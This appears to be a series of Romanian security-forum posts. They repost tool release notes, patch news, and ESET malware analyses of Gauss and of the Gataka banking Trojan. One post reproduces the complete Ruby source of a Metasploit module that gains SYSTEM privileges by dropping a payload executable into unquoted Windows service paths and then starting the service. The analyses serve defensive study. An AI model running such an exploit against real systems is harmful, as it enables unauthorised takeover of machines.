Nytro

PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING Contine 2 executabile encryptate (prost), si nu vad de ce ar contine. Ban, explicatii ulterioare dupa un alt cont daca chiar e nevoie.

[h=1]UPDATE: ThreadFix 1.0 beta 21![/h]“ThreadFix is a software vulnerability aggregation and management system that helps organizations aggregate vulnerability data, generate virtual patches, and interact with software defect tracking systems. It imports the results from dynamic, static and manual testing to provide a centralized view of software security defects across development teams and applications. The system allows companies to correlate testing results and streamline software remediation efforts by simplifying feeds to software issue trackers. By auto generating application firewall rules, this tool allows organizations to continue remediation work uninterrupted.” [h=2]Changes made to ThreadFix:[/h] Defect Tracker and Remote Provider credentials are now encrypted before being saved in the database. An IBM Rational AppScan Source Edition alpha importer is now included. A few changes have been made to ease the development of a custom Defect Tracker solution. Now users can add a database entry and drop a JAR in the ThreadFix lib to include custom Defect Tracker code. CWE names have been updated to stay current with the May 2012 2.2 release of the standard. Veracode and Qualys now import all of the scans in an application’s history instead of just the first one. Veracode vulnerabilities that were marked as false positives will now import to ThreadFix as false positives. A few Nessus vulnerability types have been added, but most Nessus findings will still not import to ThreadFix. All tables that display vulnerability or finding information have been moved to an asynchronous loading method to improve performance and memory usage. The queue for scans now behaves serially to enforce scan ordering. Several bugs have been fixed and small changes have been made to the UI. [h=3]Download ThreadFix:[/h] ThreadFix 1.0 Beta 21 – ThreadFix_1_0_beta21.zip Sursa: ThreadFix 1.0 beta 21! — PenTestIT

Va fi mai tarziu, nu in septembrie, il sun azi pe boschetu de Andrew sa vad, ca avem mai multe de discutat.

A inceput, intrati.

[h=1]UPDATE: NetworkMiner 1.4![/h]August 16, 2012 - 3:33 pm By Mayuresh “NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows. NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files. NetworkMiner collects data (such as forensic evidence) about hosts on the network rather than to collect data regarding the traffic on the network. The main user interface view is host centric (information grouped per host) rather than packet centric (information showed as a list of packets/frames).” [h=2]Official change log for NetworkMiner 1.4:[/h] DhcpPacketHandler.cs: DHCP option data is now extracted to the parameters tab. Thanks to Paul Cockayne for the idea. IPv4Packet.cs: Fragmented IPv4 packets are now properly reassembled to full IP packets with payload. IEC_60870-5-104Packet.cs: Implemented the SCADA protocol IEC 60870-5-104. Thanks to Aivar Liimets from Martem for his great support on this one! PacketHandler.cs: Added proper timestamps to detected anomaly events and improved ARP poisoning reporting to anomalies tab. NetworkMinerForm.cs: Verification of file extention is completely removed. Files with any extention can now be loaded, as long as they are valid libpcap files. NetworkMinerForm.cs: Added “Clear GUI” button to Tools menu. NetworkMinerForm.cs: Added option to show/hide cookies, NTLM challenge-responses as well as the ability to mask passwords in credentials tab. According to us, the highlight of this release is the addition of the SCADA protocol! [h=3]Download NetworkMiner:[/h] NetworkMiner 1.4 – NetworkMiner_1-4.zip/NetworkMiner_1-4_source.zip Sursa: NetworkMiner version 1.4! — PenTestIT

Smishing? Haide ba... Va introduc si eu "polonishing": primesti un link aparent inocent, si cand dai click pe el: BUM, POZA CU POLONIC, faci infarct si mori! Oricum, e acelasi rahat, daca atat te duce capul sa iti introduci datele bancare de oriunde, in orice situatie, iti meriti soarta.

Poti uploada altundeva, prea multe butoane de "Dowload" pe porcaria aia O sa ma uit diseara care-i treaba cu imaginea.

[h=1]Interconnection of Gauss with Stuxnet, Duqu & Flame[/h]by Eugene Rodionov Malware Researcher August 15, 2012 at 12:48 pm Last week, reports of a new malware named Gauss emerged, a complex threat that has attracted a lot of media attention due to its links to Stuxnet and Flame and its geographical distribution. Since ESET has added detection for this threat, we are seeing geographical distribution of detection reports similar to those detailed by Kaspersky. The countries with the biggest impact are, in order, Lebanon, Israel and Palestine. In this blog post, we analyze the connections and similarities in programming between Stuxnet, Duqu and Flame. The first thing that one can notice while analyzing Gauss is the abundance of object-oriented structures that makes it difficult to comprehend the malware functionality. The most prominent examples of malware that employ an object-oriented approach are Stuxnet, Duqu and Flame. Due to the complex logic of these threats, using object oriented programming is a reasonable way to efficiently implement their functionality. Stuxnet, Duqu and Flame utilize specific frameworks that are shown on the figure below: Figure 1 *– Stuxnet and Flame frameworks The complexity of implementation of Gauss is less than that of Flame, for instance. Even if you consider, for example, the size of the main module of Gauss (wmiqry32.dll) we can see that roughly 30% of size of its code section is devoted to standard library routines as shown on the diagram below: Figure 2 – Gauss main module layout For Flame this number is several times lower. If we arrange these threats according to its complexity then we will get the following picture (Gauss’s encrypted payload isn’t considered since we aren’t aware of its content): Figure 3 – The threats arranged according to its complexity In tables 1 and 2 you can see the results of comparison of several modules of Gauss with Stuxnet and Flame. These data are obtained with the BinDiff plugin for the IDA Pro disassembler that allows us to estimate how similar the two modules are to each other. Table 1 – Similarity of Gauss modules to Stuxnet Table 2 – Similarity of Gauss modules to Flame From the data contained in tables it may be concluded that Gauss is even closer to Stuxnet than to Flame. These data were also confirmed during manual analysis of the malware. For instance, we found the same structures handling string objects, memory buffers, streams and other elements in both Stuxnet and Gauss, whereas Flame utilized other structures to work with such elements. Based on the binary analysis the only thing that Gauss shares with Flame is the way it encrypts the strings inside the binary module. But the decryption algorithms implemented in the malware are also rather different. In the figures below decryption algorithms of strings in Gauss and Flame are presented: Figure 4 – Gauss String Decryption Algorithm Figure 5 – Flame String Decryption Algorithm Other features of the malware such as injection technique, configuration information storage, and so on are also different. Stuxnet and Flame employ rather complex injection mechanisms that allow them to bypass security software. They create the illusion of a legally loaded module to bypass HIPS-like systems. Unlike them Gauss utilizes rather a simple and straightforward injection technique. It merely allocates a memory buffer in the target process address space and copies the path to the module to inject into it: Figure 6 – Gauss injection technique Then it creates a remote thread by calling CreateRemoteThread API routine that executes only the routine LoadLibtatyW as shown in self-explanatory figure below: Figure 7 – Decompilation of the code injecting a module Another differentiator is that Flame implements quite complex configuration information storage as described in one of our blogs posts: “Flame: in-depth code analysis of mssecmgr.ocx”. The configuration information of Gauss has nothing in common with that of Flame and is stored in the registry value TimeStampForUI of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability key as binary data and is easily parsed. In our previous blog post we wrote about reconstructing the Flame framework as a composition of objects implementing a specific interface: Figure 8 – Flame Framework Architecture We haven’t found this architecture in any of the Gauss modules we analyzed. The only Gauss module that contains a piece of code implementing objects similar, in a rudimentary way, to one found in Flame is winshell.ocx, but there is no implementation of the framework comparable to figure 6. As a result it may be concluded that Gauss is another standalone kind of malware, although it is quite possible that its developers are somehow connected with developers of Stuxnet and Flame. It borrows some features from these other malware but it may not be classified as something that is based on either a Stuxnet or Flame framework. Eugene Rodionov, Malware Researcher Sursa: Interconnection of Gauss Malware with Stuxnet, Duqu & Flame | ESET ThreatBlog Although Gauss shares some features with Stuxnet and Flame there is some evidence that this is another kind of malware rather than one based on either the Stuxnet or Flame framework. This conjecture is based on the binary analysis of the modules of Gauss and below we will present several arguments supporting this idea.

Mai multe informatii de la Microsoft: Microsoft Security Bulletin Summary for August 2012

Da, informative, o sa il urmaresc si pe ultimul cand am timp. Chiar am aflat multe lucruri...

Windows Service Trusted Path Privilege Escalation Authored by sinn3r | Site metasploit.com Posted Aug 15, 2012 This Metasploit module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some softwares such as OpenVPN 2.1.1, or OpenSSH Server 5, etc... all have the same problem. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'msf/core/post/common' require 'msf/core/post/windows/services' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Post::Common include Msf::Post::File include Post::Windows::WindowsServices def initialize(info={}) super( update_info( info, 'Name' => 'Windows Service Trusted Path Privilege Escalation', 'Description' => %q{ This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. Take this file path as example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalate privileges if run as SYSTEM. Some softwares such as OpenVPN 2.1.1, or OpenSSH Server 5, etc... all have the same problem. }, 'References' => [ ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'] ], 'DisclosureDate' => "Oct 25 2001", 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'Platform' => [ 'win'], 'Targets' => [ ['Windows', {}] ], 'SessionTypes' => [ "shell", "meterpreter" ], 'DefaultTarget' => 0, # Migrate away, in case the service dies (can kill access) 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' } )) end def check if enum_vuln_services.empty? return Exploit::CheckCode::Safe else return Exploit::CheckCode::Vulnerable end end def enum_vuln_services(quick=false) vuln_services = [] service_list.each do |name| info = service_info(name) # Sometimes there's a null byte at the end of the string, # and that can break the regex -- annoying. cmd = info['Command'].strip # Check path: # - Filter out paths that begin with a quote # - Filter out paths that don't have a space next if cmd !~ /^[a-z]\:.+\.exe$/i next if not cmd.split("\\").map {|p| true if p =~ / /}.include?(true) # Filter out services that aren't launched as SYSTEM next if info['Credentials'] !~ /LocalSystem/ vprint_status("Found vulnerable service: #{name} - #{cmd} (#{info['Credentials']})") vuln_services << [name, cmd] # This process can be pretty damn slow. # Allow the user to just find one, and get the hell out. break if not vuln_services.empty? and quick end return vuln_services end def exploit # # Exploit the first service found # print_status("Finding a vulnerable service...") svrs = enum_vuln_services(true) if svrs.empty? print_error("No service found with trusted path issues") return end svr_name = svrs.first[0] fpath = svrs.first[1] exe_path = "#{fpath.split(' ')[0]}.exe" print_status("Placing #{exe_path} as #{svr_name}") # # Drop the malicious executable into the path # exe = generate_payload_exe print_status("Writing #{exe.length.to_s} bytes to #{exe_path}...") begin write_file(exe_path, exe) rescue Rex::Post::Meterpreter::RequestError => e # Can't write the file, can't go on print_error(e.message) return end # # Run the service, let the Windows API do the rest # print_status("Launching service #{svr_name}...") tried = false begin status = service_start(svr_name) raise RuntimeError, status if status != 0 rescue RuntimeError => s if tried print_error("Unable to start #{svr_name}") return else tried = true end case s.message when 1 # Service already started, restart again service_stop(svr_name) retry when 2 # Service disabled, enable it service_change_startup(svr_name, 'manual') retry end end # # "Nothing ever happened, we swears it on the Precious!" # print_status("Deleting #{exe_path}") begin cmd_exec("cmd /c del \"#{exe_path}\"") rescue ::Exception => e print_error("Unable to remove #{exe_path}: #{e.message}") end end end Sursa: Windows Service Trusted Path Privilege Escalation ? Packet Storm

Ooo da, eu stiam doar de metasploitable... Thanks.

MySQL Tutorial Abstract This is the MySQL Tutorial from the MySQL 5.1 Reference Manual. Document generated on: 2012-08-04 (revision: 31551) Table of Contents Preface and Legal Notices ........................................................................................................................ v 1. Tutorial ........................................................................................................................................... 1 2. Connecting to and Disconnecting from the Server ......................................................................................... 2 3. Entering Queries ................................................................................................................................ 3 4. Creating and Using a Database ................................................................................................................ 6 4.1. Creating and Selecting a Database ................................................................................................. 7 4.2. Creating a Table ....................................................................................................................... 7 4.3. Loading Data into a Table ........................................................................................................... 8 4.4. Retrieving Information from a Table ............................................................................................... 9 4.4.1. Selecting All Data .........................................................................................................10 4.4.2. Selecting Particular Rows ................................................................................................10 4.4.3. Selecting Particular Columns ............................................................................................11 4.4.4. Sorting Rows ...............................................................................................................12 4.4.5. Date Calculations ..........................................................................................................13 4.4.6. Working with NULL Values .............................................................................................15 4.4.7. Pattern Matching ...........................................................................................................15 4.4.8. Counting Rows ............................................................................................................17 4.4.9. Using More Than one Table .............................................................................................19 5. Getting Information About Databases and Tables .........................................................................................22 6. Using mysql in Batch Mode ................................................................................................................23 7. Examples of Common Queries ...............................................................................................................25 7.1. The Maximum Value for a Column ...............................................................................................25 7.2. The Row Holding the Maximum of a Certain Column .........................................................................25 7.3. Maximum of Column per Group ..................................................................................................26 7.4. The Rows Holding the Group-wise Maximum of a Certain Column .........................................................26 7.5. Using User-Defined Variables .....................................................................................................27 7.6. Using Foreign Keys .................................................................................................................27 7.7. Searching on Two Keys .............................................................................................................28 7.8. Calculating Visits Per Day .........................................................................................................29 7.9. Using AUTO_INCREMENT ........................................................................................................29 8. Using MySQL with Apache ..................................................................................................................32 Download: http://downloads.mysql.com/docs/mysql-tutorial-excerpt-5.1-en.pdf

[h=2]Adobe Officially Kills New Flash Installations On Android[/h]hypnosec writes "Adobe has announced that it will be making the Flash Player for Android unavailable for new devices and users from August 15 in continuation of its plan to discontinue development of Flash Player for mobile browsers. The company announced its decision through a blog post and further said that only those users who have already installed the flash player on their devices will be receiving any future updates. To ensure that this is the case, Adobe is going to make configuration changes on its Google Play Flash Player page." Sursa: Adobe Officially Kills New Flash Installations On Android - Slashdot

[h=1]exploit exercises : Learn expoiting fast[/h]August 15, 2012 - 8:16 pm By Black exploit exercises provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering. [h=2]There are three main levels in exploit exercises[/h] Nebula – Simple and intermediate challenges Protostar – Basic memory corruption issues Fusion – Advance level Nebula covers a variety of simple and intermediate challenges that cover Linux privilege escalation, common scripting language issues, and file system race condition. Protostar introduces basic memory corruption issues such as buffer overflows, format strings and heap exploitation under “old-style” Linux system that does not have any form of modern exploit mitigiation systems enabled. Fusion continues the memory corruption, format strings and heap exploitation but this time focusing on more advanced scenarios and modern protection systems. Fusion is the place to start if you are familiar with Linux exploitation and wish to learn more about exploitation prevention systems. Each of them are have levels starting from 0. It is up to us how to crack them. [h=3]Click here to learn more or download exploit exercises[/h]Sursa: exploit exercises a Learn expoiting fast — PenTestIT

[h=2]GCC Switches From C to C++[/h]According to a post on the GNU Compiler Collection list, GCC is now built as a C++ program by default. This is the fruition of much effort, and the goal now is to clean up the GCC internals that are reportedly pretty type-unsafe by rewriting them using C++ classes and templates. Pentru detalii urmariti link-urile: - Diego Novillo - Merging the cxx-conversion branch into trunk - GCC Moving To Use C++ Instead of C - Slashdot - Mark Mitchell - Using C++ in GCC is OK - cxx-conversion - GCC Wiki Sursa: GCC Switches From C to C++ - Slashdot

[h=1]Win32/Gataka banking Trojan – Detailed analysis[/h]by Jean-Ian Boutin Malware Researcher August 14, 2012 at 5:52 am Win32/Gataka is an information-stealing banking Trojan that can read all of your web traffic and alter the balance displayed on your online banking page to hide fraudulent transfers. It exhibits a modular architecture similar to that of SpyEye, where plugins are required to achieve most of the malware functionality. In our previous blog post, we gave an overview of the botnet’s capabilities and some of its recent campaigns. In this second blog post, we will look in more detail at two of the main components of Win32/Gataka: the Webinject and Interceptor plugins. As also shown in the previous blog post, here is the general architecture that characterizes Win32/Gataka. Please refer to the first blog post for a description of each plugin’s functionalities. [h=2]Interceptor Plugin[/h] This plugin creates a proxy server on the local machine so that all outbound and inbound network traffic can be examined. In the case of HTTPS traffic, fake certificates, embedded in encrypted form in the plugin resources, are exchanged between the client and the proxy server. The browser certificate checking functions are also patched in an attempt to hide from the user the fact that fake certificates are used. This plugin must be used in conjunction with other plugins to allow the botnet operator to steal personal information from the user. For instance, the Webinject plugin will set specific filters through the NextGenFixer plugin, enabling web traffic injection and modification when the user visits specific web pages. The way the interceptor module works is shown in the next figure: 1. As soon as the user launches a browser, the malware will inject its malicious payload into it, then patch the certificate checking functionality and also hook selected API functions such as connect in order to intercept all web communications. 2. In our example, the user tries to connect to a bank server which is targeted by a webinject configuration file downloaded by the malware. When the browser uses the connect API to connect to the bank server, the call will be intercepted by the malware, thanks to the installed hook. The API hooking mechanism is quite standard: it will put a jump to the malware code at the beginning of the call so that all calls to the API are redirected. The function’s first few patched bytes are saved in a separate buffer so that the malware can call the original API when needed. 3. The malware will then connect to the bank server using the information provided by the user, acting as a proxy between the two. 4. The bank communicates back to the malware. 5. The malware will relay this information to the user. It is interesting to note here that all of this is possible without the user realizing what is happening because the malware uses fake certificates to communicate with the client’s browser. Since the certificate checking functions for the browser are patched, the browser believes the transaction to be a legitimate SSL/TLS session. The fake certificates are embedded in the interceptor plugin resources: Both certificates are invalid: the one on the left has expired and the one on the right was not issued by a trusted certificate authority (CA). The certificate verification routines used by the following browsers can be patched by Win32/Gataka: Firefox Internet Explorer Netscape Navigator Opera Maxthon There are some strings referring to Chrome, but it seems that this browser is not yet supported. It is interesting to note that Maxthon, a lesser-known browser but available on several platforms, is supported, but not Chrome. This becomes understandable once we know that the same certificate verification routine is patched for both Maxthon and Internet Explorer. All Firefox versions are supported, even the latest one (i.e. 14.0.1). This version of Firefox was released on July 17, 2012 and the interceptor plugin version supporting this release was compiled on July 19, 2012. This shows that the malware is still being actively developed. We will now look further at the way Internet Explorer’s certificate verification routine is patched. The routine responsible for verifying the certificate validity is WinVerifyTrust() in wintrust.dll. According to MSDN documentation relating to WinVerifyTrust(): If the trust provider verifies that the subject is trusted for the specified action, the return value is zero. Thus, in order to patch this function, the interceptor plugin finds the routine’s start address and patches the last bytes so that it always returns zero. 6. Once the malware has performed these steps, it can intercept all communications between the user and his or her bank in clear format, even if SSL/TLS is used. Decryption of the SSL/TLS traffic is made possible thanks to the fake certificates. If the bank URL is present in the webinject configuration file, the webinject plugin will register callback with the Interceptor plugin in order to inject or modify content in the web pages the user is seeing, even if it is using HTTPS connection. The injection content may take the form of additional fields on a specific web page requiring extra personal information. The content modification may be effected through scripts that will alter an account balance in order to hide an automatic fraudulent transfer. [h=2]Webinject Plugin[/h] As seen in the previous Gataka blog post, attacks against financial institutions are performed through HTTP injections. These injections are configurable and are sent to the client following a predefined format. For each target URL, it is possible to specify where in the HTML page the malicious content should be injected. Of course, this needs customization for each targeted institution. The Webinject plugin is responsible for reading the webinject configuration file and injects the content into the targeted webpages. One really interesting observation is that the format of the webinject file used by Win32/Gataka is very similar to the one used by SpyEye. This is probably to leverage the webinject programmer base already used to write injects for SpyEye and Zeus. The following screenshot shows a Win32/Gataka file and a SpyEye webinject file to illustrate the striking similarities. The tags used to determine where the scripts should be inserted are identical for Gataka and SpyEye. The only difference we see is the usage of the end_url in the case of Win32/Gataka. Having a compatible format allows the cybercriminal to easily migrate from one malware to another, or to have bots infected with different malware and yet still be able to use the same HTTP inject configuration file. The configuration files used for injecting malicious content into webpages visited are kept in an internal database. The database is encrypted using 3DES and is located in the following location. The password to decrypt the database is kept in the file and appears as cfvsq ckj;ysq GfhjKm. Interestingly, when typed on a Cyrillic keyboard layout, this string is rendered as ????? ??????? ??????. This roughly translates to “the most complex password”, a personal touch from the malware author. Once decrypted, the file is XML-based and contains Base64-encoded data: The HTTP injection configuration files are compressed and kept within the <injdata>. During Webinject plugin initialization, the database file is read and the filters are put in place to allow successful injections. [h=3]Example Campaign[/h] One campaign we monitored was using an advanced type of webinject that automatically sends user information typed in by a user to a predefined URL. The webinject file downloaded from the C&C server shown below contains a link to a script on a remote server: When the user visits the targeted webpage, the script above is injected and causes the webpage to download an additional script from a server controlled by the botnet operator. This script is then inserted into the target page in order to steal personal information from the user. In this example, the downloaded script will show a form to the user asking for personal information as soon as he logs in the targeted web page. In order to entice the infected user into entering his personal information, he is shown a message stating that his account was locked and that personal information is needed in order to regain control of the account. The following screenshot shows the kind of information the criminals are after. The following countries had their own personalized messages: United States Canada United Kingdom Australia Spain France Germany Once the user has entered all the information required, a quick check is made by the injected JavaScript to make sure that the information entered is valid. As an example, Luhn’s algorithm is used to make sure that a valid credit card number has been entered. The data is then sent back to the control panel through a link and password provided in the script previously downloaded: It is very interesting that the link and, more important, the password are stored in clear text in the downloaded JavaScript. The harvested information is sent through a GET request to the C&C. The ability to save user information using a webinject file like the one shown above has the great advantage of being malware independent. This means that the same webinject file can be used to gather personal information from users infected with different strains of banking Trojan. It can be very useful if a bot master is managing computers infected with different malware such as SpyEye or Win32/Gataka. In summary, Win32/Gataka employs interesting techniques in order to steal valuable information from an infected user. Through API hooking, the interceptor plugin is able to view all communications coming in and out of the computer. The Webinject plugin can in turn access this information and modify or inject new content in the web sites the user is seeing. For instance, this allows the botmaster to inject advanced scripts attempting to automatically empty a user bank account or to harvest private information. In one campaign we have followed, Win32/Gataka botnet operators make use of advanced webinject configuration that can be used by different types of malware. These advanced scripts are a good example of the ways in which malware writers specialize. People specializing in writing web inject configuration files are able to sell their work to a larger customer-base and are not tied to a particular type of malware. By allowing the script itself to communicate with the control panel, it is easier to implement compatibility with a wide range of information stealing malware. ESET detects this threat as “Win32/Gataka.B trojan”. Special thanks to my colleague Axel Souchet who provided help with this analysis. Sursa: Win32/Gataka banking Trojan – Detailed analysis | ESET ThreatBlog

Au venit si update-urile de la Microsoft: http://i49.tinypic.com/2r3ch1j.png

Pai da, acum ca exista antidot, hai sa ne bagam in vene...

Da baaa, la multi ani

Si totusi, cum faci rost de el, de unul valid... ?

E o porcarie sa pui "Hacked by Vasile", nu ii pasa nimanui si nu incanta pe nimeni. Daca ai obtinut acces, puteai sa arati asta, nu sa dai cu mucii in fasole si sa pui un cacat de mesaj acolo. Nu-i nimic, speram sa te schimbi pe viitor si sa intelegi ce inseamna "penibil". Sper ca nu te astepti la prea multe laude pentru aceasta "isprava"...

[h=2]Critical Security Fixes from Adobe, Microsoft[/h]Adobe and Microsoft each issued security updates today to fix critical vulnerabilities in their software. Adobe’s fixes include a patch for a Flash Player flaw that is actively being exploited to break into Windows computers. Microsoft’s Patch Tuesday release includes nine patch bundles — more than half of them rated critical — addressing at least 27 security holes in Windows and related software. The most pressing of the updates Adobe released today is the Flash Player patch, which fixes a critical flaw (CVE-2012-1535) in the ubiquitous media player software. Adobe says there are reports that the vulnerability is being exploited in the wild in limited targeted attacks, distributed through a malicious Microsoft Word document. The exploit targets the ActiveX version of Flash Player for Internet Explorer on Windows. Nevertheless, the underlying vulnerability being targeted exists in Windows, Mac and Linux versions of the software. Windows and Mac users can grab the latest version (v. 11.3.300.271) via the Flash Player download center. Be sure to uncheck the “free” software scans that Adobe loves to bundle with updates, such as McAfee‘s obnoxious Security Scan Plus, if you don’t want it. Linux users should update to v. 11.2.202.238, and Chrome users want to be at v. 11.3.330.270 (normally Chrome auto-updates Flash, but recently it’s been sluggish to do so: my Chrome installation is still at v. 11.3.31.225. I will update this post in a bit with the direct links to the Flash Player downloads. Adobe also pushed out a new version (v. 10.1.4) of Adobe Acrobat and Reader that corrects at least 20 distinct security vulnerabilities in Windows and Mac versions of these products. Windows users can grab the latest update from this link, and Mac users from here. Those looking for links to Adobe Acrobat updates and support for older versions of Reader should check the advisory that the company issued today for more information. In addition, Adobe released an update that fixes at least five critical flaws in Windows and Mac versions of its Shockwave Player software. If you have this program installed, update it. If not, forget about this patch, as you probably don’t need the software. The latest version is Shockwave Player 11.6.6.636 and is available via this link. At the top of the heap of security updates that Microsoft released today is MS12-060, which fixes a vulnerability in Microsoft Office that is already being exploited in the wild. Other high-priority updates from Redmond include a patch for a flaw in the Remote Administration protocol of Windows networking, and an Internet Explorer update that fixes two security holes. More information on the Windows patches is available from Microsoft’s Security Response Center and from Qualys. Microsoft patches are available through Windows Update or Automatic Update. As usual, please leave a note in the comments section if you experience problems applying any of these updates. Sursa: Critical Security Fixes from Adobe, Microsoft — Krebs on Security

Ce ma uimeste e ca prezentarea initiala de la Blackhat a fost facuta de catre... o femeie! Joanna Rutkowska E bine gandita ideea, dar ar fi cam dificil de exploatat.

Linux kernel poll. Daca nu aveti ce face, si sunteti pasionati de Linux/kernel: http://www.linuxjournal.com/content/linux-kernel-poll